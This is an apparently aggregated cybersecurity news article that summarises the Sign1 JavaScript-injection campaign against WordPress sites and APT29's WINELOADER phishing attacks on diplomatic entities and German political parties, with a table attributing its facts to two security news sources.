By NewsBlogger A malware campaign known as Sign1 has compromised over 39,000 WordPress sites by injecting malicious JavaScript to redirect users to scam sites. At the same time, a separate cyber attack involving the WINELOADER backdoor targeted diplomatic entities with phishing emails linked to Russia’s Foreign Intelligence Service.
At a glance
- Sign1 malware campaign targeting WordPress sites.
- Malicious JavaScript injections redirect users to scam sites.
- Sign1 malware facilitates redirects to VexTrio’s traffic distribution system.
- Visitors to affected sites are redirected to scam sites.
- APT29 cyber attack targeting diplomatic entities with WINELOADER backdoor.
The details
A sophisticated malware campaign known as Sign1 has been targeting WordPress sites, compromising over 39,000 websites in the last six months.
The malware utilizes malicious JavaScript injections to redirect users to scam sites, with the most recent variant infecting an estimated 2,500 sites in the past two months.
The attacks involve injecting rogue JavaScript into legitimate HTML widgets and plugins, using XOR-encoded JavaScript code that is decoded and executed from a remote server.
Sign1 Malware Operation
The Sign1 malware facilitates redirects to a traffic distribution system operated by VexTrio, employing time-based randomization to fetch dynamic URLs that change every 10 minutes.
Domains used in the attacks are registered shortly before their use, and the malware checks if visitors have come from major websites like Google, Facebook, Yahoo, and Instagram before executing.
Impact on Visitors
Visitors to affected sites are redirected to scam sites by executing additional JavaScript from the same server.
Since the second half of 2023, the Sign1 campaign has seen multiple iterations, with WordPress sites potentially compromised through brute-force attacks or exploiting security flaws in plugins and themes.
Malicious injections are often discovered inside WordPress custom HTML widgets, and attackers install a legitimate Simple Custom CSS and JS plugin to inject malicious code, allowing the malware to remain undetected for extended periods.
In a separate cyber attack incident, the WINELOADER backdoor was utilized in phishing attacks targeting diplomatic entities, with phishing emails containing wine-tasting lures.
The hacking group behind the attacks, known as Midnight Blizzard or APT29, has links to Russia’s Foreign Intelligence Service (SVR). The attacks targeted German political parties around February 26, 2024, using phishing emails bearing the logo of the Christian Democratic Union (CDU).
APT29 Cyber Attack
This marks the first time the APT29 cluster has targeted political parties. WINELOADER was first disclosed by Zscaler ThreatLabz last month as part of an ongoing cyber espionage campaign since at least July 2023. The attack chains leverage phishing emails with German-language lure content, invoking the malware through DLL side-loading using the legitimate sqldumper.exe.
WINELOADER has been employed in operations targeting diplomatic entities in multiple countries, with German prosecutors charging a military officer with espionage offenses for allegedly spying on behalf of Russian intelligence services.
These incidents highlight cyber attackers’ evolving tactics and the increasing sophistication of malware campaigns targeting WordPress sites and diplomatic entities, underscoring the importance of robust cybersecurity measures to protect against such threats.
Article X-ray
Sources
Here are all the sources used to create this article:
Facts attribution
This section links each of the article’s facts back to its original source.
If you suspect false information in the article, you can use this section to investigate where it came from.
| securityweek.com |
|---|
| – Sign1 malware campaign has compromised over 39,000 WordPress sites in the last six months – The malware uses malicious JavaScript injections to redirect users to scam sites – The most recent variant of the malware has infected an estimated 2,500 sites in the past two months – The attacks involve injecting rogue JavaScript into legitimate HTML widgets and plugins – The malware uses XOR-encoded JavaScript code that is decoded and executed from a remote server – The malware facilitates redirects to a VexTrio-operated traffic distribution system – The malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes – Domains used in attacks are registered a few days prior to their use – The malware checks if the visitor has come from major websites like Google, Facebook, Yahoo, Instagram before executing – Site visitors are taken to scam sites by executing another JavaScript from the same server – The Sign1 campaign has seen several iterations since the second half of 2023 – WordPress sites may have been taken over by brute-force attacks or exploiting security flaws in plugins and themes – Malicious injections are often found inside WordPress custom HTML widgets – Attackers install a legitimate Simple Custom CSS and JS plugin to inject malicious code – This approach allows the malware to stay undetected for extended periods of time |
| thehackernews.com |
|---|
| – The WINELOADER backdoor was used in recent cyber attacks targeting diplomatic entities with wine-tasting phishing lures – The hacking group behind the attacks has links to Russia’s Foreign Intelligence Service (SVR) – The group responsible for the attacks is known as Midnight Blizzard (aka APT29, BlueBravo, or Cozy Bear) – The malware was used to target German political parties with phishing emails bearing a logo from the Christian Democratic Union (CDU) around February 26, 2024 – This is the first time the APT29 cluster has targeted political parties – WINELOADER was first disclosed by Zscaler ThreatLabz last month as part of a cyber espionage campaign ongoing since at least July 2023 – The attack chains leverage phishing emails with German-language lure content – The malware is invoked via a technique called DLL side-loading using the legitimate sqldumper.exe – WINELOADER has been employed in an operation targeting diplomatic entities in multiple countries – The first-stage malware’s expanded use to target German political parties is a noted departure from the typical diplomatic focus of the APT29 subcluster – German prosecutors have charged a military officer with espionage offenses after he was allegedly caught spying on behalf of Russian intelligence services |
